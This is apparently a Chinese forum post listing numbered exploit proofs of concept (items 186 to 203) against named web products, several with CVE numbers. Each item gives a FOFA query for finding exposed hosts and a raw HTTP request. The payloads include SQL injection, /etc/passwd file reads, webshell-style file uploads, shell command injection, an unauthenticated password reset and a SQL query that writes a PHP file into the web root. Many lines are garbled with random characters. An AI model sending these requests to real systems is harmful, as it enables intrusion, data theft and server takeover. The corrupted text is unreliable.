GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1! N9 f* r- F9 a, j, j
Host: host
& c: r0 X) R4 u5 Y3 M2 c5 Y$ O' u/ N% M8 D# B
5 a; F6 ?$ N6 P( I186. F-logic DataCube3 SQL注入; i2 U% {2 [4 G; F! e, G) I/ E9 T
CVE-2024-31750; j/ k3 N/ @$ @0 z# A
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统0 k J, ]3 V( e$ }- I; H
FOFA:title=="DataCube3"
! x" b6 {$ g! t7 C y6 W+ W' gPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
6 s) J# ]0 V* c$ F N! XHost: your-ip
$ \- G2 \5 ?5 _! d; X: o6 K' v% uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
) y' N; s, [, q) J1 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.85 |. E0 ?; w3 y' ?7 }+ e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: M! x* w7 y) x b; o E
Accept-Encoding: gzip, deflate. Q3 S/ C$ c- {( D
Connection: close
# o3 a& D! {+ P' M' w7 I1 MContent-Type: application/x-www-form-urlencoded
, ` a7 r2 S2 ?9 L1 ?3 \+ v6 }6 e0 S) L9 `1 w
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14501 i3 R8 W2 y; }! |5 B" Y7 A
7 b6 a9 ^4 \7 E( h9 k
8 V9 o+ q' A" v- n d5 O& V
187. Mura CMS processAsyncObject SQL注入- g8 e3 t% R3 e5 z/ l
CVE-2024-32640
) ~8 }* c5 V5 Q J9 {7 kFOFA:"Mura CMS"4 w' N$ G H: C1 Y7 U
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
/ H+ L- k, y% |: @- \; D7 }8 HHost: your-ip( \0 W: L' n) Q1 w- u
Content-Type: application/x-www-form-urlencoded" k# D) Q0 _0 W! W! Q
\) ?5 L+ s, {7 I [
5 X4 [: t% M: _8 W( N
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1, F% C4 |4 y% X6 m* ~6 a3 E
) Q+ @! s# [2 u1 }' ?- b! L
! I& F1 ~, m( {, }) e3 r1 @188. 叁体-佳会视频会议 attachment 任意文件读取
' h% A- V3 P U6 X8 dversion <= 3.9.7
/ ^' G7 h/ {0 }) T! Z6 U5 m; PFOFA:body="/system/get_rtc_user_defined_info?site_id"
+ I* H2 v6 N/ E0 ?8 m$ b0 a. RGET /attachment?file=/etc/passwd HTTP/1.1
2 ^0 r1 L, U t THost: your-ip
( a: D" Y Z M3 k, | uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ k$ J# i1 n+ BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: J% Y. d; y9 M! L" k8 K$ R* [Accept-Encoding: gzip, deflate1 R! G" F' [& R; ]/ _
Accept-Language: zh-CN,zh;q=0.9,en;q=0.88 _" r! L( h" j! m1 Z z
Connection: close; k9 y4 z/ B! V7 j! Q$ Q: `' Z
- A+ z' X' Q$ Z+ z4 I. ?, A# T0 M: F2 h! \6 o: V- f* y
189. 蓝网科技临床浏览系统 deleteStudy SQL注入5 ?+ y# C5 D0 W% d# o
FOFA:app="LANWON-临床浏览系统"
& Z! T% p \, A6 `" x4 nGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
: B: k/ ^0 Q: k' yHost: your-ip
& T; a6 P5 R& b3 F6 W7 B! p* qUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ Z5 l1 G: z0 G! X( R1 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: G" E" G) Y& kAccept-Encoding: gzip, deflate5 b0 u, I( w2 o, X0 @( I; v7 ?
Accept-Language: zh-CN,zh;q=0.9
" O7 W/ w, }& ~( M, `Connection: close
: E" |5 u. E8 j7 J: l! H- ^+ ]5 U
1 T. Z/ j) \" y% ^& i, A4 y190. 短视频矩阵营销系统 poihuoqu 任意文件读取
+ B s1 u( M9 r: a" [* ZFOFA:title=="短视频矩阵营销系统"
! ~5 k- S4 R5 x4 YPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
& t! D9 ]5 p1 y4 yHost: your-ip
# i# ~9 c) }' C- w$ |. H. BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
/ l% f9 P: A. c, s' ^7 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* p6 z7 F* ]$ L8 f7 g1 ZContent-Type: application/x-www-form-urlencoded
& j( P9 G$ t+ R% ~* eAccept-Encoding: gzip, deflate
6 D4 ~3 z2 k) l5 vAccept-Language: zh-CN,zh;q=0.9
^+ m ]! H4 \' K/ x" p0 ?. N4 e. k3 ?! v
poi=file:///etc/passwd# @: O7 c# ^: m# ?7 }
/ L6 J3 g) k& n- b" p) C6 e! A" K4 Y
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入7 l1 o& {* e+ ]( }# i9 T
FOFA:body="/CDGServer3/index.jsp"
7 t8 i+ I& n' l$ \POST /CDGServer3/js/../NavigationAjax HTTP/1.1
* M( T/ P6 D9 p$ e, `( THost: your-ip
, L6 ?: M+ C4 C9 B& E- HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 V) w0 j0 y. D" q
Content-Type: application/x-www-form-urlencoded
0 X/ T. u# K9 \$ |/ Q1 x( \% s2 `+ A2 p2 L" r5 d
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=7 Y( [/ N# Q$ d ~) f7 y
4 n W( @! D' ]8 v
4 @0 y* a/ t5 ~" v4 Y
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传: a$ w& @; {" x2 s4 B& J
FOFA:title="用户登录_富通天下外贸ERP"" O0 b( P- {0 t6 b7 A
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1* `* w5 D* M* Z& |9 z) T* f x1 @2 g
Host: your-ip
- @1 N9 L- _7 J1 _! X5 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 {0 d' J8 D2 g' Z0 |
Content-Type: application/x-www-form-urlencoded
( G1 }6 [6 y! g" x2 b
3 V y+ d* j8 R$ H. d; h3 l( l- D$ ~6 @: J: u) G
<% @ webhandler language="C#" class="AverageHandler" %>- H; Q5 |8 ~7 s! Y" _
using System;
* `( v$ k; d0 O8 R! kusing System.Web;/ O( F/ y$ D, y; k# P5 D% m/ M% Y
public class AverageHandler : IHttpHandler6 z+ k* ?* a( Q, b6 q! `
{ f h# Z) j/ n
public bool IsReusable
* G: g+ h [' Y& g/ z% v3 m* }{ get { return true; } }
( | C( A( U6 b1 z6 N8 Epublic void ProcessRequest(HttpContext ctx)0 }& d; K. \) ]) o% j K. l
{
3 I1 C# V$ P" s5 g8 _ctx.Response.Write("test");9 ]" \1 Y0 E3 u: e" M" O
} n% U4 L) e0 }" `2 J. E$ e
}
U3 {& {0 q9 A' z5 ~6 g. s- Y6 u# ]. L, Y* \# l; z( z
2 e* U' k0 S& Q% K
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行0 U6 k2 T$ y: }/ P$ q8 b% g3 x
FOFA:body="山石云鉴主机安全管理系统"1 [8 W* r! S- s. F$ F# i" e
GET /master/ajaxActions/getTokenAction.php HTTP/1.1% S$ R) Y$ w7 x8 F: `0 a5 b+ g
Host: v% v* R5 O2 S' Z# C. r
Cookie: PHPSESSID=2333333333333;
+ F \& e# O8 B1 Z# rContent-Type: application/x-www-form-urlencoded! B( }, q( \3 N8 k: K! z6 z! O# x
User-Agent: Mozilla/5.0
t" `: D# x: X, F" H0 A- E( E$ i! _' F: {( U
0 |5 k, S2 }- B6 X7 [, s0 ]1 q
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.17 J8 W Z1 Z" u$ S3 V
Host:& I" O/ S, C; k8 N: v: {2 W# k4 f
User-Agent: Mozilla/5.0
2 x) b( J3 `1 C" H4 v2 v' IAccept-Encoding: gzip, deflate8 e1 }0 C) |3 W) y7 K, D7 i! _
Accept: */*
5 r" b5 S* T: f( V' Z! lConnection: close
3 d6 ], v8 y8 o' a0 C: O0 [ ~* gCookie: PHPSESSID=2333333333333;5 E. B- |# Y; c# V& ^
Content-Type: application/x-www-form-urlencoded( R/ m2 [1 H$ `/ `5 k$ N
Content-Length: 84
$ W9 o' K; i8 r" o: d
6 \) h4 q" t- |4 n! X- vparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
+ j# o5 s9 \$ c0 D K. O Y- r! C' R! @$ }2 [
8 _: Y8 j* i7 l( M9 vGET /master/img/config HTTP/1.1( y" k5 a* e2 R! Q$ F, P$ r5 P, p) c
Host:
) ^6 Z# F! u9 _3 g/ I& ?User-Agent: Mozilla/5.0: y* t M0 b+ X( B5 m$ [
2 H0 [& V- P3 B) a( e: a
# Y$ y4 ^: v+ Q9 X$ z194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
0 z- X2 z' u+ @! @ rFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在& e. u ?& U! N6 |2 D' |
+ O- J# E7 z2 [1 C& ?, vPOST /servlet/uploadAttachmentServlet HTTP/1.1' W: u. t9 ]; U" H+ F$ R+ @6 N
Host: host! \* e6 j. v) P& O6 a+ o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.360 ?9 s, G+ C) ]1 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 C' d- N% c$ gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! b0 R5 h, M. \) t$ H; EAccept-Encoding: gzip, deflate
m1 A! w0 R, E! V# ^+ hConnection: close
/ L& c& d) c6 C& gContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
1 {9 M" t t/ v------WebKitFormBoundaryKNt0t4vBe8cX9rZk+ } c; s' n" {6 m& _- o
+ z. e3 Q, j) W9 e3 D9 Y+ KContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"1 w2 p- I! H) s
Content-Type: text/plain
1 c% w3 s+ o X<% out.println("hello");%>3 U! A3 h$ S8 k* }0 t
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
" n: p/ f3 x, s0 ZContent-Disposition: form-data; name="json"
1 S- U# {% i2 ?! ~) G; R {"iq":{"query":{"UpdateType":"mail"}}}& o$ u$ k: p# N
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
6 Q4 T; }- Y+ D0 E9 ~8 E1 V: K9 k: |' H# _% U
) g& v$ b5 b2 D9 ~
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 y4 B8 F9 @4 ~# |6 l4 d# G# P
FOFA:title=="飞鱼星企业级智能上网行为管理系统. Z9 G: R0 q3 d' F; P; u L6 k* a
POST /send_order.cgi?parameter=operation HTTP/1.1
% u! ~8 @( M* }! z( SHost: 127.0.0.1
1 Q3 k8 |) \6 f6 J1 G7 qPragma: no-cache9 T' T7 D5 b0 ?! U* M5 W. P& i
Cache-Control: no-cache
/ l0 r1 T' n1 B+ k I4 M7 U- T) IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! c: A* h1 e' u& v
Accept: */*
! Z( P/ M' [5 l# d" K3 X4 v" z, ?Accept-Encoding: gzip, deflate! a+ _$ j$ X' B! h' k
Accept-Language: zh-CN,zh;q=0.93 Q: x4 E8 R3 _
Connection: close) E! v5 l/ r6 _
Content-Type: application/x-www-form-urlencoded
) ?/ L5 Z% T+ m& J( Z- [, \Content-Length: 68, E" c2 ^2 k5 Y2 n- L' x
7 c4 {; u+ o5 n% p3 E
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
, f, H, R- Z. {5 h' ~2 i' t
! g& e- T3 H9 ]- z1 n
* K2 [! H" @+ j* e196. 河南省风速科技统一认证平台密码重置8 X- n5 O2 j; q5 g; y& n5 C
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"0 [4 T6 G* _, E; y
POST /cas/userCtl/resetPasswordBySuper HTTP/1.11 ^/ s f' Y# L7 u9 S6 t' B+ @! d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.360 r, s$ ^ Z2 a: \! S- V- g
Content-Type: application/json;charset=UTF-8! c& l" d- R7 \: n! @
X-Requested-With: XMLHttpRequest- f6 v' ^4 c" |! ^' m; Q# u
Host:' V5 r+ S8 o" X: a5 I
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.22 x4 W: p- ?$ q# F+ H# |; f& U( N! @+ U
Content-Length: 45/ v. t4 U# ]4 U) ~
Connection: close* v9 L& D, N* ], W
/ L; x( ^! p2 c! ?2 R; j" u# ^
{"xgh":"test","newPass":"test666","email":""}
/ ?7 }) X) F5 _; l1 i
1 t h% T8 C' _3 E+ u$ h
+ ~# U, y0 `* _/ O/ [4 M9 ^% u" y9 Z* s: i- ^1 Y: o
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% B7 j8 `9 x8 m& u0 w6 m& E5 [! C) x
FOFA:app="浙大恩特客户资源管理系统") A, {0 {* {& Y4 t& w4 y
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
3 I+ S5 t$ w6 F9 S: v7 lHost:+ F9 j( m2 w1 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.360 R6 q, Z' r4 r$ f- t" s
Accept-Encoding: gzip, deflate
' h# t! T- A- O8 bConnection: close
( e! [# R2 R4 |2 v; O0 k+ f! r/ Q# Q! [" d" h" [
- z% w( g; T& O f# s; M! A$ p0 a: J8 S
198. 阿里云盘 WebDAV 命令注入
3 y2 f; J# w% rCVE-2024-29640
/ r- K/ E. [7 U2 s4 }3 A+ k) B; b& LGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1% b+ S3 ?1 u* T
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf642 K1 H# t+ E/ J% J8 }
Accept: */*/ M* {* T! s' J, V) Y
Accept-Encoding: gzip, deflate" @8 G5 P' e/ O% l- v
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
& [8 t- s2 e2 FConnection: close
. ~! v- o6 j$ E& G# }5 x. F2 e2 q! } m, j9 c5 {
3 N' E2 L8 M# J6 Y7 K: ^199. cockpit系统assetsmanager_upload接口 文件上传2 l3 x" k! f8 ~# _: N! E
$ u% V& b# g0 f/ P6 W
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
" {4 \) y; m8 X2 r8 n* NGET /auth/login?to=/ HTTP/1.1, W5 _- z* _5 _$ X5 r* }0 K) s
: ]4 [8 u `9 x) B响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"+ s, ?! X6 w' `4 R8 X8 J( k
; Q: E+ G" f* W4 i# N' B. v) b, @! q: S2.使用刚才上一步获取到的jwt获取cookie:6 G9 N+ U$ E/ l6 t" p K: _% v' D
0 r4 G6 f4 v B9 e
POST /auth/check HTTP/1.1; ?& ]- b+ t* Y5 ], T
Content-Type: application/json: S% F d5 [9 m: |) d
# p' k9 C( Q% x% `+ w- s{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
" O( r; r1 W; t1 i. C# j6 E
0 ^! l. z1 m+ j: a# G: C' `. o3 {4 V4 C) z响应:200,返回值:
" l. O1 J4 G( o; e3 [Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/ V, S0 K" R0 j* i2 |" S" t$ d
Fofa:title="Authenticate Please!"
8 r2 \$ I2 @6 Z; ?POST /assetsmanager/upload HTTP/1.1
! u. [0 ~, G+ n, DContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3. S- U) M0 l, d
Cookie: mysession=95524f01e238bf51bb60d77ede3bea922 s M, C v r$ T
3 T3 T7 Z; m( e. z4 x* G-----------------------------36D28FBc36bd6feE7Fb3: x. N: V9 `4 F$ T3 {7 o9 W
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
& u" _; q+ v8 A4 q0 S! k0 ?) uContent-Type: text/php4 j9 x2 O* \3 Y& C7 u& ]
6 J: B- @2 F4 m. N3 g3 S" m6 t<?php echo "tttt";unlink(__FILE__);?>
. x# ~$ ~- R; m8 O% n-----------------------------36D28FBc36bd6feE7Fb3 G# G5 c" J! \( l3 V, Y( ~8 C
Content-Disposition: form-data; name="folder"
' M6 t$ | ]( I5 Z! \0 m1 B; J
2 I7 Y7 y+ W! m7 l S, p$ k1 o8 ~-----------------------------36D28FBc36bd6feE7Fb3--
9 e, R! ^2 F/ b- Z( s9 ^* v4 g, \* v" N: N7 s- S3 g3 G5 A
B9 k+ f2 ]) E2 H8 ]- _/storage/uploads/tttt.php
3 b* B/ ^! a1 l2 Z$ {# ~( L) _2 `% x! W
200. SeaCMS海洋影视管理系统dmku SQL注入5 G- }9 `9 E% {( h
FOFA:app="海洋CMS"
, r& y* C" z. W" |, h. K0 bGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1' V6 I" U# @. c8 x: }
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s5 o5 O! P. E1 y1 G8 N
Upgrade-Insecure-Requests: 1: [" k7 ?, B2 Y
Cache-Control: max-age=0. I* G! i% o* \+ d9 [4 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ w* w. F6 p4 l5 o$ @9 I# u; oAccept-Encoding: gzip, deflate
0 F: H) y8 K- n) l: E* r$ o; EAccept-Language: zh-CN,zh;q=0.9
1 Z! y/ E6 P* Y+ } Y' B' H
+ n6 ?* u Z P, L
% s9 ^6 [& V( ~& P+ f. k8 s6 k& u201. 方正全媒体新闻采编系统 binary SQL注入
* O5 Z1 a, p2 l) CFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
. }# c) A: R4 G7 I# d' ] A# g/ v6 ?POST /newsedit/newsplan/task/binary.do HTTP/1.1
) p% w5 v1 N2 [. [Content-Type: application/x-www-form-urlencoded! I1 f+ \. l4 G* e# a. d5 q& D' U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- d3 U: j- ^& ~/ Z/ q% c* F* \Accept-Encoding: gzip, deflate
& A, ]1 i' ]" aAccept-Language: zh-CN,zh;q=0.95 V! _9 r g9 o) h, N
Connection: close# o4 o m+ v/ Y/ j2 V$ O
9 n% T9 I( c! D) ]( A
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=14 [5 A2 q: r) F
T4 ]3 c0 O5 R+ v# {0 h' e5 N! n
- c: z+ I5 n1 h. g( k202. 微擎系统 AccountEdit任意文件上传. X" [$ u: S* x3 `( @
FOFA:body="/Widgets/WidgetCollection/"
' u! s. K9 q ^- m& s6 H获取__VIEWSTATE和__EVENTVALIDATION值! o9 v" F( K0 `7 H4 G& I0 G
GET /User/AccountEdit.aspx HTTP/1.1$ a% b2 E% D0 n& W2 x
Host: 滑板人之家. v1 J" s* T! D+ N4 W; @6 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
2 K1 F0 t0 K0 ]4 g' cContent-Length: 0* x; F @3 P& c$ B% B" ~
' |7 l7 o9 R, Y/ W/ B7 p
9 I1 }5 @6 E& _) L% s8 `9 _- Y/ B替换__VIEWSTATE和__EVENTVALIDATION值9 e0 x8 t! {% G4 |; T, v1 e
POST /User/AccountEdit.aspx HTTP/1.1$ x; Z' ?+ h7 x0 ?: T# J
Accept-Encoding: gzip, deflate, br
- i) A$ ? i& O6 i3 F" vContent-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356879 f1 a! q; x* v; b
8 b5 F' b& F: H-----------------------------786435874t38587593865736587346567358735687
% X( Y3 m7 A/ G, kContent-Disposition: form-data; name="__VIEWSTATE"* d6 [" S; b; R
6 f; F: [4 N4 a- V
__VIEWSTATE9 E& Q) z) A! o6 p* C: q
-----------------------------786435874t38587593865736587346567358735687
7 L) o+ `- p: M; _Content-Disposition: form-data; name="__EVENTVALIDATION"
' A) Q* M' e* t( m7 q: ^5 f# n2 n
__EVENTVALIDATION
/ F: ~* ^* W4 T0 y' d-----------------------------786435874t38587593865736587346567358735687
% f$ {) w3 ]' \& W0 c4 aContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
4 v" D2 s7 n- F$ |: W4 v9 oContent-Type: text/plain. ?* B6 o) _2 l( E% ]6 D
p7 P7 A% V6 q6 R# _1 ^Hello World!- S5 H! U6 z5 I: n
-----------------------------786435874t38587593865736587346567358735687
& z' `/ R) B* u' w$ |Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
. ]8 k' w0 `' O; i' y& J+ J* G1 ]6 E
上传图片
/ L# a3 P! s; I" A8 h-----------------------------786435874t38587593865736587346567358735687: e2 i4 N9 I5 V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
+ L/ A2 @9 G0 E3 k1 N0 Z; |( i) _. _# V J- J7 ~7 a
. w# |4 A( Y* o- N3 |- y; n: Q% P/ Q, z-----------------------------786435874t38587593865736587346567358735687' y; q3 I2 {: \# g& Z7 d
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
7 G9 `" F( U* V3 {( V
- w( F! S( l+ @& W$ T9 Z- z4 X( U2 S
& E5 v4 y/ `. y( i4 l1 G-----------------------------786435874t38587593865736587346567358735687--
) T* V7 {7 Y3 h! J) b
' J9 t( ?* A( {$ c7 U1 ^# C2 v4 v$ b* U! ~5 }
/_data/Uploads/1123.txt3 @8 P; I9 J8 a9 y6 V' o+ ^
- y" O# g. ]! H( e203. 红海云EHR PtFjk 文件上传8 ?, G% v& O v% N" C# ?% H( m
FOFA:body="RedseaPlatform"$ X2 V7 F0 C+ M3 _ n2 Z0 V
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1( D' {' L; l' u! a1 M+ H/ i
Host: x.x.x.x1 s3 O7 }( ?* X- N# x
Accept-Encoding: gzip V; i6 b) r ^# u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# V, ^" {' F, V E7 `Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
L2 h+ I# j3 V' OContent-Length: 210
& m G, R/ j: x8 {- I
0 X& n8 q1 m: T5 V* b- U' {: |------WebKitFormBoundaryt7WbDl1tXogoZys4
3 o# |/ k8 \5 U. `3 JContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
3 S7 Y3 K6 i4 M' P, p2 Z! ]! YContent-Type:image/jpeg% \. ~# {1 d1 C# j# Z& }
8 N- F7 O5 a! w4 R K; `7 ]) K7 V
<% out.print("hello,eHR");%>1 M, E) h* y$ |: E
------WebKitFormBoundaryt7WbDl1tXogoZys4--, s% S: |8 D9 ?; V7 L! h" m
8 F! O- c- i% M" f+ o7 z
4 T: g4 H, d6 I! D* C% m }" t+ j9 P
+ {! w- R0 k5 g- m" G
- g2 F! A L3 ^+ [
: R/ I4 P# C/ _7 U8 R- S
|
发表于 2024-6-5 14:31:29
收藏
支持
反对